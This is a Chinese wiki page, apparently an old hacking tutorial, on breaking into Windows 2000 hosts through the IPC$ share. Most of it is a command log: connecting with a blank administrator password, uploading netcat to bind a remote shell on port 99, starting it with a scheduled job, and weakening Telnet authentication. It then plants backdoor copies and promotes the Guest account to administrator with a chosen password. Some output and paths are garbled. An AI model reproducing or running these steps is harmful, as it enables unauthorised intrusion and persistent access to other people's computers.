来自当知百科
跳转到: 导航搜索

目录

IPC$入侵

  IPC$是Windows的默认共享。其实,这个共享并没有什么漏洞。

  我们可以用主机的管理员用户名和密码连接。

  问题就出在管理员密码了。直至现在为止,世界上起码有20%的人,把主机密码设置为“空”或者“123”等简单密码。

  我们要寻找这些主机十分简单。只需要一个程序就可以。

  下面,我会把以前写的一篇IPC$入侵文章,进行小小的修改。

范例

  本次范例需要的系统及程序情况如下:

  操作系统:Windows 2000

  对方操作系统:Windows 2000

  程序(一):流光 IV 国际版 (Fluxay Release IV Build 2914 InternationalEdition For NT/2000/XP)

  程序(二):Srv.exe

  程序(三):Ntlm.exe

  本机IP:127.0.0.1

  测试IP:127.0.0.25

新程序介绍:

  Srv.exe:实际上是NetCat,这里改名为Srv.exe。用于在主机建立一个端口为99的shell。

  Ntlm.exe:是小榕写的一个程序,用于修改Windows 2000 Telnet Servery身份验证的方式。

  关于扫描的方法,在流光的help目录有一个ipc.mht的文件。里面有使用说明。

扫描IPC$主机

  假设,我们扫描了一台IPC$主机:127.0.0.25

  用户名:davis

  密码:空

  “//”后是注解。

  Microsoft Windows 2000 [Version 5.00.2195]

  (C) 版权所有 1985-1998 Microsoft Corp.

  D:>net use \127.0.0.25$ "" /user:"davis"//这是我用流光扫到的密码Youzi我们就拿它开刀吧~!

  命令成功完成。

  D:>copy srv.exe \127.0.0.25$ //先复制srv.exe上去,在流光的Tools目录就有。

  已复制 1 个文件。

  D:>net time \127.0.0.25 //查查时间。

  \127.0.0.25 的当前时间是 2001/1/17 上午 10:48

  命令成功完成。

  D:>at \\127.0.0.25 10:50 srv.exe//用at命令启动srv.exe吧~!(这里设置的时间要比主机时间快)先去论坛灌几篇帖子。

  新加了一项作业,其作业 ID = 1

  D:>net time \\127.0.0.25 //再查查够时间没有?!噢~~够了~

  127.0.0.25 的当前时间是 2001/1/17 上午 10:51

  命令成功完成。

  D:>telnet 127.0.0.25 99 //我们telnet吧,注意端口是99哦~

  Microsoft Windows 2000 [?セ 5.00.2195]

  (C) Copyright 1985-1999 Microsoft Corp.

  C:> //噢~~成功了!

  D:>copy ntlm.exe[\127.0.0.25$[//我们再开一个DOS窗口,把ntlm.exe上传到主机上。(也是在流光流光的Tools目录)

  已复制 1 个文件。

  Microsoft Windows 2000 [?セ 5.00.2195]

  (C) Copyright 1985-1999 Microsoft Corp.

  C:>ntlm //我们输入ntlm启动吧。

  ntlm

  Windows 2000 Telnet Dump, by Assassin, All Rights Reserved.

  Done! //OK~:)

  C:>

  C:>net start telnet //然后直接用net start telnet启动telnet.

  net start telnet

  Telnet 狝叭タ?币笆 .

  Telnet 狝叭?竒币笆Θ?? //直觉告诉我成功了~!(没办法,这里是乱码)

  C:>

  C:> //这个窗口已经没用了,关了他吧!

  D:>telnet 127.0.0.25 //我们在开一个DOS窗口,然后telnet上去。

  NTLM Authentication failed due to insufficient credentials.Please login with

  clear text username and password

  Microsoft (R) Windows (TM) Version 5.00 (Build 2195)

  Welcome to Microsoft Telnet Service

  Telnet Server Build 5.00.99201.1

  login: davis //输入用户名

  password: //输入密码(密码是空的,所以不用输入)

  *===============================================================

  舧?ㄏノ Microsoft Telnet Server?

  *===============================================================

  C:>copy c:.exe c://留个后门。

  ╰参тぃ??﹚?郎??

  C:>copy c:.exe c:.exe //再留多个后门。

  狡籹? 1 ?郎??

  C:>net user guest /active:yes //将Guest用户激活.

  ??磅︽Θ??

  C:>net user guest cnhack //将Guest的密码改为cnhack,或者你要设定的密码。

  ??磅︽Θ??

  C:>net localgroup administrators guest /add//将Guest变为Administrator。^_^

  ??磅︽Θ??

  如果管理员把密码更改,而guest帐号没改变的话,下次我们可以用guest再次访问这台计算机。(不过权限就比较小了。——

  后门够多了吧Youzi 2010年9月5日 (日) 15:19 (CST)呵呵~~一个跳板就做好了!

  C:>

解惑:

  1)IPC连接是WindowsNT及以上系统中特有的远程网络登陆功能,其功能相当于Unix中的Telnet,由于IPC$功能需要用到WindowsNT中的很多DLL函数,所以不能在Windows 9.x中运行。

  也就是说只有nt/2000/xp才可以建立ipc$连接,98/me是不能建立ipc$连接的(但有些朋友说在98下能建立空的连接,不知道是真是假,不过现在都2003年了,建议98的同志换一下系统吧,98不爽的)。

  2)即使是空连接也不是100%都能建立成功,如果对方关闭了ipc$共享,你仍然无法建立连接。

  3)并不是说建立了ipc$连接就可以查看对方的用户列表,因为管理员可以禁止导出用户列表。

建立ipc$连接在hack攻击中的作用

  就像上面所说的,即使你建立了一个空的连接,你也可以获得不少的信息(而这些信息往往是入侵中必不可少的),访问部分共享,如果你能够以某一个具有一定权限的用户身份登陆的话,那么你就会得到相应的权限,显然,如果你以管理员身份登陆,嘿嘿,就不用我在多说了吧,whatu want,u can do!!

  (基本上可以总结为获取目标信息、管理目标进程和服务,上传木马并运行,如果是2000server,还可以考虑开启终端服务方便控制.怎么样?够厉害吧!)

  不过你也不要高兴的太早,因为管理员的密码不是那么好搞到的,虽然会有一些傻傻的管理员用空口令或者弱智密码,但这毕竟是少数,而且现在不比从前了,随着人们安全意识的提高,管理员们也愈加小心了,得到管理员密码会越来越难的:(

  因此今后你最大的可能就是以极小的权限甚至是没有权限进行连接,你会慢慢的发现ipc$连接并不是万能的,甚至在主机不开启ipc$共享时,你根本就无法连接.

  所以我认为,你不要把ipc$入侵当作终极武器,不要认为它战无不胜,它就像是足球场上射门前的传球,很少会有致命一击的效果,但却是不可缺少的,我觉得这才是ipc$连接在hack入侵中的意义所在.

个人工具
名字空间

变换
查看
操作
导航
工具箱